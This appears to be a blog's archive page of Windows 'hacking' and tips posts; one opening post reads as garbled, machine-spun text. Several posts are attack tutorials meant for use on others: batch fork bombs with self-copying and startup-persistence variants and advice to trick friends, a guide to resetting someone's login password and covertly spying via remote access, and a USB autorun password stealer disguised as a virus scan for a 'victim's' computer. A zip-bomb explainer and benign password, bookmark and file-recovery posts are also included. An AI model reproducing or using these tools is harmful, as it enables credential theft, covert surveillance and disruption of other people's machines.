Showing posts with label windows. Show all posts
Showing posts with label windows. Show all posts

Wednesday 25 February 2015

How to Hack Windows Administrator Password

This particular publish will highlight how you can crack Home windows Administrator password sometimes whenever you overlook this or even when you wish in order to access some type of computer that you don't know the actual password.Just about everyone has skilled a scenario exactly where within we have to access some type of computer that is pass word guarded or even sometimes we might your investment manager pass word without having that this gets not possible in order to record into the pc. Therefore, if you're fairly inside a exact same type of scenario, right here is a superb crack utilizing which you'll totally reset the actual pass word or even help to make the actual pass word bare (remove the actual password) to be able to obtain administrator use of the actual pc.

Hacking the Windows Admin Password:

You can do this with a small tool called  Offline NT Password & Registry Editor. This particular utility works offline, which means you have to turn off as well as trunk away your pc utilizing a floppy drive, COMPACT DISC or even HARDWARE gadget (such because pencil drive). The actual device has got the subsequent functions:
 You don't to understand the actual aged pass word to create a brand new.
 This particular device may identify as well as uncover secured or even handicapped away person company accounts.
 There's also a registry publisher along with other registry resources which functions below linux/unix, as well as may be used with regard to other activities compared to pass word modifying.


How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config.

Thursday 20 November 2014

Fork bomb {complete tutorial}

Picture of how to make a fork bomb exe
this will teach you how to make a harmless fork bomb program which will lock up a computer when run.

note:
yes you can modify this to make a DOS error but im not going to be the idiot to tell you how

Step 1: Making the .bat

Picture of making the .bat
open up notepad and enter the following text:
:fork
start %0
%0|%0
goto :fork

save it as something.bat
to the desktop


there are about a million different ways to do this, i gave you disputably the best one, other variants include:

my favorite is the spread like a real virus bomb

explorer bomb:
:e
start %0
start C:\Windows\explorer.exe
%0|%0
goto :e

program bomb:
:e
start %0
start anyprogramyouwant
%0|%0
goto :e

the mini bomb:
%0|%0

inefficient bombs:
#1:
:e
start
start
start
goto :e

#2:
:e
start cmd.exe
goto :e

#3
:e
start (name of the batch file)
goto :e

slap in the face for deleting this bomb:
IF (DELETE whatever.bat) goto :e
IF (ERASE whatever.bat
:e
start %0
%0|%0
goto :e

matrix bomb:
@echo off
color 0a
:x
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% (lots of randoms)
start %0
%0|%0
goto :x

spread like a real virus bomb:
:e
copy /Y %0 %random%.bat
start %0
%0|%0
goto :e

alphabet fork:
:a
start %0
%0|%0
goto :a
:b
start %0
%0|%0
goto :b
:c
start %0
%0|%0
goto :c
:d
start %0
%0|%0
goto :d
:e
start %0
%0|%0
goto :e
:f
start %0
%0|%0
goto :g
:h
start %0
%0|%0
goto :i
:j
start %0
%0|%0
goto :j
:k
start %0
%0|%0
goto :k
:l
start %0
%0|%0
goto :l
:m
start %0
%0|%0
goto :m
:n
start %0
%0|%0
goto :n
:o
start %0
%0|%0
goto :o
:p
start %0
%0|%0
goto :p
:q
start %0
%0|%0
goto :q
:r
start %0
%0|%0
goto :r
:s
start %0
%0|%0
goto :s
:t
start %0
%0|%0
goto :t
:u
start %0
%0|%0
goto :u
:v
start %0
%0|%0
goto :v
:w
start %0
%0|%0
goto :w
:x
start %0
%0|%0
goto :x
:y
start %0
%0|%0
goto :y
:z
start %0
%0|%0
goto :z
:bob
start %0
%0|%0
goto :bob

Step 2: Convert to exe

Picture of convert to exe
download bat to exe converter
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
extract it to the desktop and run it
chose your something.bat for the batchfile and an icon if you want
press compile
there should be a something.exe on your desktop

Step 3: Deploy

Picture of Deploy
2.JPG
now this can be run on any machine that runs exe's
you can trick a friend into running it once for fun, or you can use it with an autorun.ini on a cd to make it run as soon as its inserted
or you could be more deviant and make it run every time the user logs in, to do this just drag and drop it to the startup folder in the start menu

25 deadliest notepad viruses .







Here I am posting scripts which are used in creating a virus using
notepad. Some of them will works on windows xp and some of them in windows 7.


First thing you need to do is to open notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r run window will open and
type notepad and hit enter .

No 1:- 


Friday 14 November 2014

Strong Password.

  Do it now before it's too late.

Password strength is a measure of the effectiveness of a password in resisting guessing and brute-force attacks. In its usual form, it estimates how many trials an attacker who does not have direct access to the password would need, on average, to guess it correctly. The strength of a password is a function of length, complexity, and unpredictability. 
1.Minimum length 8 characters :
►As a rule of thumb, your password must never be below 8 characters. If an attacker happens to use a brute-force attack on your account,which is just trying every possible comobination - with every addition of a character the time taken for the BF attack to crack your password increases exponentially. On average, while it may take just a few minutes to crack open a 6 character password, the time taken for cracking an 8 character password is measured in days and weeks. Assuming your attacker doesn't have a a billion dollar ExaFlop supercomputer after your account, your password is reasonably safe if it is over 8 characters in length(ExaFlop = 10^18 calculations per second).
2.Names and '123' are out of the question :
►The most common passwords are "Name123". Whenever someone is after your account, the first thing they try is common passwords like this. Whoever that person is, you have to assume the worst. It might be some random old guy in his mom's garage or maybe your best friend goofing around, you must assume they know everything about you- your name(duh), amily member's names, favourite sportsmen, actors, singers- everything. This is the safest way to go. A surprisingly large number of people simply append a '123' to the front or back of a common object thinking they are very smart, but this is the most predictable password there is. Most hackers will start straight away by adding that '123', and if your password is anything like this, you're screwed. Change it ASAP! 
One more thing that deserves mention here is the so called "Security Question". Reason being that people who know you will know questions about you like "What was your first pet's name?" or "In what town were you born?" - some of the most common security questions. Plus, the people who know you are far more likely to be interested in taking a peek at your private messages than a random old guy in a garage.
Hence, I recommend to never actually use the security questions in the way they are meant to be used. Don't use a direct answer, use something that the question reminds you of. While these may offer another layer of protection from annonymous attackers, they can make cracking your account fairly easy by the people who know you. As an example, someone you know well if left alone with access to your mobile phone might be able to get into your Facbook account with no difficulties at all. Always treat security question as an emergency password, it should be unobvious but easy to remember. 
3.Random things? Think again.
►There's something called a dictionary attack. In a nutshell, it means that your attacker has a dictionary, and a program that will throw every word in the dictionary as an attempt to crack your password. After trying out your own and related names +'123', this is what the Hacker is going to try next - A dictionary attack. So it is better if you keep your password well away from any real words.
Although still not a 100% safe, 'potjack123' is much safer than 'jackpot123'. 
4.Turn it around :
►Now a password like 'aGF$hvYH916!~**' is probably as safe as it can get, but it's not exactly easy to remember and definitely not easy to type quickly. For this reason, I(for one) turn words around. What I mean by that is instead of using 'velocity', use 'yticolev'. While as a normal word, it's easy to guess but after reversing the characters it's unrecognizable.
After a few times, you'll get used to it and will be able to type it as quickly as the other one. 
5.Throw in symbols and numbers easily :
►If you're like most people, your current passwords probably don't have any weird symbols. But I have a quick way of adding both numbers and symbols to your password.
Here's an example -
'567yticolev%^&' 
Looks weird, right? Well that's the point. What we have here is, the base word 'velocity' - reversed, a '567' at the start (which is much better than a '123'), and at the end I have seemingly random symbols which are actually just 'SHIFT + 567', that is these are actually the ones written above '567' on your keyboard respectively. So all you have to remember is velocity and '567' and within a few days you'll be able to type this as fast as any other password but only this one will be relatively impenetrable. (Unless of course you have a supercomputer after your ass, in which case you're screwed XD) 
6.Capitalize- The final blow :
►You might be wondering what's the point of adding so much random stuff to your password. Our main goal is basically to expand the number of characters which your attacker has to test to find your password. So - Small alphabets = 26 characters, Numbers = 10 more, Symbols = around 20 more. But if you throw in even just one Capital alphabet, that means your attacker has another 26 freaking characters to test which means, in this case, he's screwed. Reason being the brute-force attack I mentioned earlier. Say your password is the one in the last point with a capital 'V' and 'Y' :
'567YticoleV%^&' 
So that's 14 characters with upper and lower case alphabets, numbers and symbols. Believe it or not, such is the power of exponential growth that it will actually take an average computer BILLIONS even TRILLIONS of years to crack your password. Now even if your insane attacker can somehow get a supercomputer, it would take him several thousands of years to get your password. After even a fraction of this time we can safely assume that he would have lost all his money buying the supercomputer and the will to do whatever he wanted to do with your account. (You can calculate the exact time by using permutations and combinations and the speed of the CPU) 
One last thing, by using the same passwords for several different accounts you'll only be making the hacker's job easier. But yes, remembering a dozen passwords is probably not worth it. For this I suggest making tiny changes. If you use 567velocity for gmail, you can use 456velocity for facebook, 678velocity for yahoo etc. To hack the next account the hacker will have to go through all the combinations all over again and that for him, will probably not be worth it. 
So there you have it! For all practical purposes a password like this will be impenetrable throughout your lifetime. (Nevertheless, I still recommend changing your password around twice a year or so. That's because you're not the only one reading this article.)

How to Hack a Computer

Hacking a computer is a useful and, at times, an important skill to pick up. Below are instructions for getting past a password (if you find yourself logged out of a computer or want to check up on your child or spouse), gaining remote access to a computer (to check on a user or help locate a stolen machine), or crack a wifi password (in the event of an emergency, such as if you become lost in an unfamiliar city and you need to look up directions.

Method 1 of 2: Getting Past a Log In Password


1 Boot the computer in safe mode.


2 Click “Start”.


3 Click “Run”.


4 Type in “control userpasswords2”.[1]


5 Change passwords for any account. This is probably going to be obvious to the user, so you may have to tell them a little white lie. Try something along the lines of: "Oh, I hear computers glitch like that sometimes. You can always type in recoverpassword if you get locked out and then set a new password" (in which case you will want to set the password to the account to recoverpassword or whatever you tell this person).[2]


6 Reboot the computer.

Method 2 of 2: Getting Remote Access


1 Download the program LogMeIn. There is a free version, though you can purchase a subscription if that better meets your needs.[3]
The program will need to be downloaded to the computer you intend to remotely view or use. This makes it useful for gaining access to your computer if it is stolen or for checking up on your teen’s daytime activities during the summer.

You will have to make an account with the LogMeIn website in order to use the software.



2 Log in to the website. Log in to LogMeIn’s website.


3 Navigate to the “My Computers” page. It should open automatically when you sign in.


4 Add the computer you intend to remotely access. You will see an “Add computer” button on the page. Click that and fill in the info for the computer you intend to access.


5 Click the name for the computer once it’s added.


6 Log on to the computer. This means you’ll have to know the username and password for the account you’re trying to access or view.


7 Click “Remote Control”. If you’re trying to be sneaky (such as to spy on the user), try to move the mouse as little as possible and don’t click on anything.


8 Log out when you’re done.

Thursday 13 November 2014

Zip Bomb

A zip bomb, also known as a decompression bomb (or the 'Zip of Death' for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory.

The classic zip bomb is a tiny zip file, most are measuered in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to Petabyte, i.e 1000 Terabyte. Some go up to exabytes too). Yes, we're talking about stuffing exabytes of data into kilobytes. In my view, this ingenious little trick is the product of "pure hacker mentality". In essence, it's nothing like phishing or sessio hijacking or anything else that has put a bad name to "hackers". It's a simple creative solution, an exploited loophole which truly shows: "Where there's a will, there's a way". To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR etc.)

Various compression software and tools make use of what's called "Lossless compression algorithms". As the name suggests, these algorithms strive to compress files without any loss of information. Clearly, when we compress a file we'd definitely want to get it back in the same shape after decompressing. These algorithms usually exploit statistical redundancy in such a way as to represent the sender's data more concisely without error. In English now: We know that the computer only understands 0's and 1's, So every single program or any data stored in your computer is actually just a series of 1's and 0's (Binary form). Let's take an example that's not entirely correct but will help you understand the principle. Say, we've got a file which after being converted to binary launguage looks like "1110000101". Remember statistical redundancy that was mentioned earlier? Try to spot it in this string (1110000101). Statistical redundancy basically means that the same thing is repeated over and over again. In this string we see that there are three 1's followed by four 0's. Now take a look at this string: "3140101". What just happened here is compression. We can simply write a program that codes and decodes files as above (Softwares like WinZip use a fancy form and overly complicated form of what we did above). If the program finds repeating patterns, like a lot of 1's together, it may simply replace all those 1's by another number. Another example, we find "111111111" somewhere in a program. That's nine 1's in a row. What if we replace it by "91"? We can simply code our program to replace a "91" by writing "1" nine times, effectively reversing the process. Again, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it can be instructed to write the successive number, in our case 1, 9 times. So "91" gets converted back to "111111111". That's lossless compression.

What about the previous string (3140101)? On uncompressing this, we get back 1110000101, that is, the original string. Like I said, this example is not entirely accurate. Note that the computer only understands binary. Everything that you'll ever do on a computer will have, at some point, been converted to binary form. Actually the computer is forced to convert to something other than binary (like english) only for us, dumb humans. We compressed "111111111" by writing "91". But the "9" in the "91" will also have to again be converted into 1's and 0's. So our program is quite buggy. Widely used programs like WinZip, WinRar, PowerISO etc. use various different algorithms for different cases.

Lossless compression is possible because most real-world data has statistical redundancy. Lossless compression schemes are reversible so that the original data can be reconstructed.
However, lossless data compression algorithms will always fail to compress some files. Indeed, any compression algorithm will necessarily fail to compress any data containing no discernible patterns. Attempts to compress data that has been compressed already may actually result in an expansion, as will attempts to compress all but the most trivially encrypted data. This is why if you've ever tried "ZIPing" or "RARing" a file, you would have noticed in some cases it works great while in other cases it may not even reduce the file size by 5%. (WinRAR and WinZIP can be considered the same for (almost) all practical purposes. Their names differ more than their compression abilities. Feel free to use either.)

Now, back to zip bombs. Before taking a deeper look, let's get the basic meaning cleared up. Take a new text file and write '0' a 1000 times. Save it, the file size should be just around 1 kilobyte. Open it up, CTRL+A, CTRL+C,CTRL+V - i.e, copy the whole thing then paste it. Do this ten times. Our file is now around 10kb, and completely made of 0's. Do this a few more times. Faster than your expectations, the file size will quickly climb into megabytes and then gigabytes. In most cases, the notepad (or any text editor) will actually begin to lag since it has a ridiculous amount of 0's open in the window. When that happens, that's your cue to slow down since different operating systems and softwares can have unexpected behavious when dealing with such large files. Practically, just keep it under a few gigabytes and you should be fine.
(Even this may be too much for some systems, I recommend pausing at about a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you've reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0's. A little perspective: That's over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you're getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It's only fair.

And we're back. What do we do now with that ridiculously large text file? Compress it and watch your seriously underappreciated computer do magic. In the same directory, you'll now see the pointlessly large text file, and alongside it, a zip file that should be under 1 Megabyte. That's like stuffing 5000 balls into the volume of one.

Now, for a deeper look let's check out the most famous zip bomb, the 42.zip file. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level - effectively converting their exponential growth to linear.

(Here's a small website dedicated solely to the 42.zip, http://www.unforgettable.dk/ . You can ven download a ready-made zip bomb from here. Password for the zip file is '42'. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads)

Now, to avoid giving the wrong impression a myth needs to be busted. "Zip Bomb" is not a very accurate name for this malicious file. If you extract a zip-bomb, it won't do anything to your computer though, it'll just create 16 smaller zip-bombs. If you decompress one of those it'll yield 16 more zip-bombs. As such, they're not going to "explode" when someone opens them, they're just used by malware authors to knock out anti-virus software so malware can work without needing to watch its back. What happens is, a malicious program may plant a zip bomb somewhere near it as bait for AV software. The program will wait until the anti-virus comes up for a routine scan, and it'll wait, "hiding" behind the zip-bomb. When the anti-virus reaches the bomb, it'll try to open it, all in its limited memory. 1 file becomes 16, which becomes 256, and it goes on until the memory is full. In reality though, the computer never runs out of memory because each process is only allowed to use so much memory, after it hits its limit it crashes itself to protect the rest of the computer from an OOM (Out-Of-Memory) event. When this happens to an anti-virus program as it's trying to dig into the file for malware, the software simply crashes and exits, while leaving the rest of the computer unharmed. The malware will detect this, and will then use that opportunity to do whatever it wants, without having to worry about AV software that might be right around the corner. Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large", because until the last level the total amount of data is not "that much", you don't "see" how large the files at the lowest level are until you have reached that level, by which time it is, of course, too late). However, most anti-virus software today recognizes a zip-bomb when it sees one, and will skip over it, alerting the user that the computer might be infected with malware. They usually go down to the second or third level before flagging the file.

Further, You wouldn't notice disk space being used because zip-bombs only decompress in an anti-virus program's memory, not to the disk. Most manual archive-opening programs don't even have a recursive opening mode for this very reason. Plus you also wouldn't notice much extra work by the CPU, because zip-bombs work so fast they can knock out an inadequately protected anti-virus program in seconds, while only using a fraction of the total computer's memory.

The 42.zip is just one example, there are many more like this and you can create your own. A similar file is an XML-based decompression bomb called "billion laughs" (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory (Again, most browsers today will detect such recursive expansion and simply not try to parse the booby-trapped XML).

There's even a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders have long gone. It's a 5.61 kilobyte zip file that expands to 4 Zettabytes. It seems to be at the absolute limit of zip bombs. Here's the KickAss Torrent link:http://kickass.to/zip-bomb-insanely-huge-zip-archive-4zb-t2105770.html (As a challenge, you can try replicating it. The file structure has been explained in the link: 8 layers, 32 archives in each layer, each archive containing a 4Gb file)

Let's walk through the process once again. Make a 4 Gb text file full of 0's. Zip it. Let's call it zip1. Create, say 10 copies of this zip file. We have 10 zip1's. Now, zip all ten zip1's again. Call it zip2. We're at the second level now and we can simply continue the process for as long as we like and the zip file will just keep getting bigger and bigger. A common doubt is, How can we create a zip file that opens up to a 4 Zettabyte size without having 4 Zettabyte memory on our computers? Actually, we don't even need 10 Gb for this. We just took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file as it is no longer required. All we need is the first single tiny zip file and it is of this zip file that we create more copies, zip them up, create more copies and zip again and so on.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Yet again, the name DDOS is going to pop up here. Zip bombs are basically DDOSers for antiviruses. Limited memory is a 'flaw' that has remained in all computers since their inception and hackers always find a way to exploit it. When the old methods stop working, new ones soon pop up and take their place. DDOSing, Zip Bombs, Fork Bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming 'memory management' really is. And so, we live another day, ready to combat the next problem.

Wednesday 12 November 2014

USB Password Stealer

Because looking like an expert is easier than being one.
There's a lot of people in the world and even more online accounts. Every security system has a flaw and what we're going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to "recover" saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What's quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to "Show Saved Paswords" in the options menu. We're going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you'll learn in this tutorial. So, with a goal in mind and not a second to spare, let's start right away. 

Things you will need (See link below):- 

MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications. 

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc 

IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer. 

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. 

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/

So that's that and now we are ready to create a USB password stealer. 
Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ;-) 

1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any]) 

2. Create a new Notepad and write the following text into it: 



[autorun] 
open=launch.bat 
ACTION= Perform a Virus Scan 

Save the Notepad and rename it from New Text Document.txt to autorun.inf 
Now copy the autorun.inf file onto your USB pendrive. 

3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.) 
start mspass.exe /stext mspass.txt 
start mailpv.exe /stext mailpv.txt 
start iepv.exe /stext iepv.txt 
start pspv.exe /stext pspv.txt 
start passwordfox.exe /stext passwordfox.txt 

Save the Notepad and rename it from New Text Document.txt to launch.bat 
Copy the launch.bat file also to your USB drive. 

These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files. 

Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it's magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work. 
See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious. 
This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

Tuesday 11 November 2014

Import and Export all bookmarks.

Whenever we format our computer we backup all the data on the external hard-disk or make a backup dvd but what about the bookmarks ? Do i have to write all the urls on the notepad or word file ? How do i save all the bookmarks to a file and then how to i import it from that file? Now i got a solution for you ,importing and exporting all the bookmarks in just four clicks.
                                                        CHROME

1
Click the Chrome menu button. This is located in the top-right corner of the Chrome window. The icon is three horizontal bars.

2
Select Bookmarks from the Chrome menu. In the new menu that appears, select Bookmark Manager from the top of this list. This will open a new tab in your Chrome window for the Bookmark Manager.

3
Click Organize. This button is located right below the search bar, and has a little arrow pointing down next to it.
4
Select “Export bookmarks to HTML file”. A Save As window will appear allowing you to name your bookmark file and set a location to save it to.You can send this bookmark file to whoever you want, and they can use it to import your bookmarks into their browser.
You can use the steps to import the bookmarks but while you click on organize you need to click on "Import bookmarks from html file" then locate the file and its done.
                                                          FIREFOX
 First click on the "Bookmarks" and then click on "show all bookmarks" and then you need to  click on "Import and Backup".
Then you need to click on import bookmarks or export bookmarks and rest of steps are same. 
Sharing is caring.

Sunday 31 August 2014

How To Recover Deleted Files From Hard Drive

When you delete any file in windows it goes to Recycle bin where you can easily restores it as it has restore option. But how you can recover your files when you delete it permanently (In windows by pressing Shift+DEL) ?. Sometimes we accidentally deletes photos, videos or important document files from your computer, USB drive, SD card or anything else then how can you recover it ? Well don’t worry about it there are many powerful file recovery software available on the internet which let you to recover permanently deleted files from your system. As I told you that there are a lots of  hard drive recovery services. But I searched around the internet and tested several recovery softwares so, now I’m going to tell you the top best disk/data recovery softwares.

How To Recover Deleted Files From Hard Drive

1. Recuva

Recuva is one of the most popular and powerful file recovery tool for Windows. You will find it very easy to navigate because of it’s clean interface user-friendly options. It has following features :
  • Undelete files on your computer
  • Recover deleted emails
  • Securely delete files you want to erase forever
  • Restore unsaved Word documents
Recuva How To Recover Deleted Files From Hard Drive
Recovering files vis Recuva  is very easy you have to simply download and install the Recuva then after opening it now select what you want to restore. You can search for deleted Pictures, music, documents, videos, compressed files or emails. If you’re not sure about file name, just select ‘All Files’ option. Now select the file, either right-click on it press Recover button to recover it.

2. Panda Recovery

Panda recovery is the another best hard drive recovery service/tool for recovering files. It helps to recover deleted files from hard drive, USB, Network drives etc. It is best because of following features :
  • Browse, Search, Preview and Recover deleted files.
  • Recover Archived, Hidden, Encrypted, Compressed files.
  • Recover Images, Documents, Movies, or any other type of files.
  • Recover to Local Hard Drive, Network Drive, or Flash Drive.
panda recovery1 How To Recover Deleted Files From Hard Drive
The process of recovering files from Panda recovery is very simply you have to just follows wizard and its instructions.

3. Test Disk

This is also the one of best hard drive recovery service providing software. It is a powerful free data recovery software which helps to recover lost partitions andor make non-booting disks bootable again when these symptoms are caused by faulty software, certain types of viruses or human error (such as accidentally deleting your partition table). TestDisk is available for lots of operating systems, including Linux, Windows, and Mac OS, and supports lots of file systems. It has following features :
  • Fix partition table, recover deleted partition.
  • Rebuild NTFS boot sector.
  • Undelete files from FAT, exFAT, NTFS and ext2 file system.
  • Recover NTFS boot sector.
test disk1 How To Recover Deleted Files From Hard Drive
You need to be careful for using this and better to use on screen instructions while using it.

4. Reclai Me 

This is another data recovering software. It is simple tom use because if it’s user friendly interface more ever it can recover files under Windows (FAT16, FAT32, exFAT, NTFS, ReFS file systems), Linux (EXT2, EXT3, EXT4 and XFS file systems), Mac(HFS, HFS+ and UFS file systems). It has following features :
  • Undelete a single file or multiple files.
  • Unformat a hard drive (desktop and laptop).
  • Recover RAW file system drive.
  • Recover data in case of boot failure.
reclaime1 How To Recover Deleted Files From Hard Drive
Just simply follow on screen instruction to recover data using ReclaiMe.

5. Restoration

Last but not least, this one very simple to use. Restoration works with FAT and NTFS as well as digital cameras cards. It is also powerful tool for recovering lost/deleted data. It has following features :
  • Recover deleted files.
  • Undelete files.
  • Unformat a hard drive.
  • Photo recovery.
restoration1 How To Recover Deleted Files From Hard Drive
Just as others to use it simply follows the on screen instructions.
So, this is all about hard drive recovery service/tools. I hope this helped you a lot. If you are facing any problem just comment it below. Feel free to share Thanks !!

 

© 2014 US Helplines. All rights resevered - US Helplines - Designed by Templateism

Back To Top